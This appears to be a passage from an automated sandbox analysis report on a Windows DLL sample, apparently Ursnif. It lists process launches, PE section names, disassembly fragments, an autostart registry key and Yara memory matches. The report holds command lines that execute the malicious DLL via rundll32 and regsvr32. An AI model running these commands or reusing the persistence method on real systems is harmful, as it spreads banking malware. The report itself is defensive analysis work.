            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\direction.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Moler
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Adipous
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Undazzled
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Peckishness
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82994 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17448 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:4876 CREDAT:345098 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Musophagidae
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Impracticability
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\direction.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,OpisthotonosJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,HydrazoJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,OverlockJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,AutomobilistJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,SwamplandJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,SubarachnoidJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,BechainedJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,UnforeseennessJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,IncriminationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,OversystematicJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,ShieldlessJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,TsarevitchJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,TorchbearerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,MolerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,HyperpigmentedJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,AdipousJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,UndazzledJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,PeckishnessJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,MusophagidaeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,ImpracticabilityJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82994 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17448 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:4876 CREDAT:345098 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BAC LoadLibraryA,GetProcAddress,0_2_10001BAC
            Source: direction.dllStatic PE information: real checksum: 0x44eb9 should be: 0x40da6
            Source: direction.dllStatic PE information: section name: .unsooth
            Source: direction.dllStatic PE information: section name: .prekind
            Source: direction.dllStatic PE information: section name: .aqueoig
            Source: direction.dllStatic PE information: section name: .spiritr
            Source: direction.dllStatic PE information: section name: .nectaro
            Source: direction.dllStatic PE information: section name: .philolo
            Source: direction.dllStatic PE information: section name: .pres
            Source: direction.dllStatic PE information: section name: .outglad
            Source: direction.dllStatic PE information: section name: .pogonir
            Source: direction.dllStatic PE information: section name: .taurico
            Source: direction.dllStatic PE information: section name: .untar
            Source: direction.dllStatic PE information: section name: .muskroo
            Source: direction.dllStatic PE information: section name: .cricoto
            Source: direction.dllStatic PE information: section name: .breaghe
            Source: direction.dllStatic PE information: section name: .shunnab
            Source: direction.dllStatic PE information: section name: .hemaut
            Source: direction.dllStatic PE information: section name: .uncongr
            Source: direction.dllStatic PE information: section name: .tonner
            Source: direction.dllStatic PE information: section name: .jink
            Source: direction.dllStatic PE information: section name: .stirles
            Source: direction.dllStatic PE information: section name: .imper
            Source: direction.dllStatic PE information: section name: .unsubve
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\direction.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10000083 push eax; iretd 0_2_100000B2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002120 push ecx; ret 0_2_10002129
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002173 push ecx; ret 0_2_10002183
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE458 push ds; retf 0_2_005EE47A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE0C7 push cs; ret 0_2_005EE0C8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EAF6F push ecx; ret 0_2_005EAF7F
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EE163 push edx; iretd 0_2_005EE164
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EABC0 push ecx; ret 0_2_005EABC9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0304 push dword ptr [ebp-00000280h]; ret 0_2_003D0373
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0478 push dword ptr [ebp-00000280h]; ret 0_2_003D04AE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [ebp-00000280h]; ret 0_2_003D065D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [ebp-00000288h]; ret 0_2_003D06B1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF push dword ptr [esp+10h]; ret 0_2_003D07C7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D02D2 push dword ptr [ebp-00000280h]; ret 0_2_003D0477
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D07C8 push dword ptr [esp+0Ch]; ret 0_2_003D07DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D07C8 push dword ptr [esp+10h]; ret 0_2_003D0822
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FAF6F push ecx; ret 2_2_047FAF7F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FABC0 push ecx; ret 2_2_047FABC9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F202D2 push dword ptr [ebp-00000280h]; ret 2_2_02F20477
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [ebp-00000280h]; ret 2_2_02F2065D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [ebp-00000288h]; ret 2_2_02F206B1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF push dword ptr [esp+10h]; ret 2_2_02F207C7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20478 push dword ptr [ebp-00000280h]; ret 2_2_02F204AE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F207C8 push dword ptr [esp+0Ch]; ret 2_2_02F207DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F207C8 push dword ptr [esp+10h]; ret 2_2_02F20822
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20304 push dword ptr [ebp-00000280h]; ret 2_2_02F20373
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447AF6F push ecx; ret 4_2_0447AF7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447ABC0 push ecx; ret 4_2_0447ABC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0ABC0 push ecx; ret 6_2_04C0ABC9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0AF6F push ecx; ret 6_2_04C0AF7F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0478 push dword ptr [ebp-00000280h]; ret 6_2_027C04AE

            Boot Survival:

            barindex
            Creates an undocumented autostart registry key Show sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser ITBar7LayoutJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY
            Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
